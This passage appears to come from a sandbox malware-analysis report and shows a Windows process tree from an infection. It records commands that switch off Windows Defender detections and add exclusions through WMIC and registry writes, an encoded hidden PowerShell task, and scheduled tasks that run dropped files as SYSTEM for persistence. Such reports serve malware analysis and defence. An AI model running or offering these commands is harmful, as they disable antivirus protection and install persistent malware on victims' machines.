- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2148

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1492

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:680

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2228

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:32
3⤵
PID:2792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:64
3⤵
PID:188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:32
3⤵
PID:2780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:64
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:32
3⤵
PID:200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:64
3⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDaAhyKdZ" /SC once /ST 04:26:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:840

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDaAhyKdZ"
2⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDaAhyKdZ"
2⤵
PID:3888

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 02:24:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\hpXbguT.exe\" gh /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1260

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
2⤵
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2260

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2152

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2128

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1504

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\hpXbguT.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\hpXbguT.exe gh /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:752

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3828

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3940

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2256

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2320

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2064

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3676

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2776

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:988

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
2⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:2852

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:3508

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3720

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:3940

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\aNrXDj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2812

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JRajWlGIFNTafba2" /F /xml "C:\Program Files (x86)\anjFGKdzU\qtqQIoj.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3036

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JRajWlGIFNTafba"
2⤵
PID:1604

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JRajWlGIFNTafba"
2⤵
PID:1504

C:\Windows\SysWOW64\schtasks.exe
